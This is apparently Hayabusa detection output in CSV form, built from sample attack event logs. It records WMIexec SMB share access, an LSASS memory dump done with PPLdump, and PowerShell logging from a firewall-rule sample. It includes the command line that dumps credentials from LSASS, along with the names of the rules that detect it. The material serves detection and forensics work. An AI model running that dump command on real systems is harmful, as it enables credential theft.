Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 
747F3D96-6E19-6082-0000-0010885D0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.084 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: 
C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing 
LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 
747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt 
User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 19:09:29.667 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.671 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.674 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.677 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.757 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.758 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.761 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.764 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.783 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.792 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.793 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.795 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:29.796 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
